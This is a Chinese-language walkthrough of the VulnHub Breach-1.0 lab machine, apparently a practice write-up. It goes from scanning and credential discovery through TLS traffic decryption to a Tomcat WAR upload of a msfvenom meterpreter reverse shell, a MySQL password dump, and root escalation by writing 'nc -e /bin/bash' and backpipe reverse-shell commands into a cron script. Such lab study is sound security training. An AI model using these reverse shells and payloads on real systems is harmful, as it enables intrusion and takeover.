kali渗透综合靶机–Breach-1.0靶机

下载地址：

下载链接：https://download.vulnhub.com/breach/Breach-1.0.zip

端口扫描

因为这个靶机，按照配置需求，我们已经知道了他的ip，所以我们直接开始端口扫描

nmap -T4 -A -v 192.168.110.140

但是，和我们想的有点出入，扫出来端口有点多，估计是不让我们进行端口扫描

没办法，我们先打开自己最喜欢的80吧

查看源码

右键查看源代码，或者F12，我们可以看见有一段注释

看起来像是加密，管他的，直接解密再说，经过两次解密，成功获得一下内容

pgibbons:damnitfeel$goodtobeagang$ta

盲猜是一个账号密码，现在找找有什么地方可以进去

点开刚刚的帅哥图片，我们进去另外一个新的网页，一顿乱点，我们进入了一次cms系统

目录扫描

dirb http://192.168.110.140

通过扫描，我们没有发现扫描其他有用的目录

成功使用刚刚的密码，进入系统

出现一个目录系统，管他的，先看看有没有可以使用的

扫描漏洞

对于开源cms系统，我们可以去扫描已知开源漏洞，接下来打开msf

虽然扫出来几个漏洞，但是没办法使用

现在只能再来看看cms里面还有没有什么好东西可以利用

突然看见有几份邮件

我们看见这里有一个.keystore文件

接着我们有发现了这样一个文件，是wireshark的流量包

并且发现一个密码”tomcat“,接下来，我们解密这个keystore

使用命令，拿到证书，我们导入wireshark

keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat

编辑–首选项–protocals–TLS –edit

对流量进行过滤

ip.src==192.168.110.140 || ip.dst == 192.168.110.140 and http

解密后，得到这样一个地址

浏览器却打不开，提示非安全链接。。。。

接下来，我们使用burp来进行代理绕过证书 限制

接下来，就可以进去了

出现一个登录框

通过浏览抓包，接着找到账号密码

我们进入新的管理应用后台

这里有个上传的文件地方，我们来上传木马

创建war包

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.war

设置msfconsole监听

依次输入一下代码

use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.110.129
set lport 7777
exploit

快速上传kali.war 并且访问，成功获取权限

metersploit默认不能交互式shell，但是如何安装了python，可以使用一下命令进行切换

python -c \'import pty;pty.spawn(\"/bin/bash\")\'

然后我们查看到该网站为apache部署的，Apache默认网站在/var/www下面

发现一个mysql数据库，并且知道数据库为root，密码为空

使用一下代码获得用户密码

show databases;
use mysql;
show tables;
select user,password from user;

通过MD5解密获得，milton的密码为thelaststraw

从历史命令里面空间，他切换过用户，但是密码确实离谱，来源于以前的那一堆图片里面，使用的图片隐写

将图片都下载下了之后，使用exiftool工具获取到隐藏文件信息

exiftool * | grep -i -e \'File Name\' -e \'Comment\'

接着我们成功进入blumbergh

通过我们查看历史，我们发现一个定时任务，可以借此来新建反弹shell

kali再新建一个监听 nc -lvvp 5555

先将反弹shell命令写入shell.txt文件,nc反弹命令

echo \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txt

再使用tee命令将shell.txt内容输出到tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

也可以用mknod backpipe p && nc 192.168.110.129 2222 0<backpipe | /bin/bash 1>backpipe反弹shell

查看tidyup.sh文件写入成功：cat /usr/share/cleanup/tidyup.sh

成功获取root权限

------本文已结束，感谢您的阅读------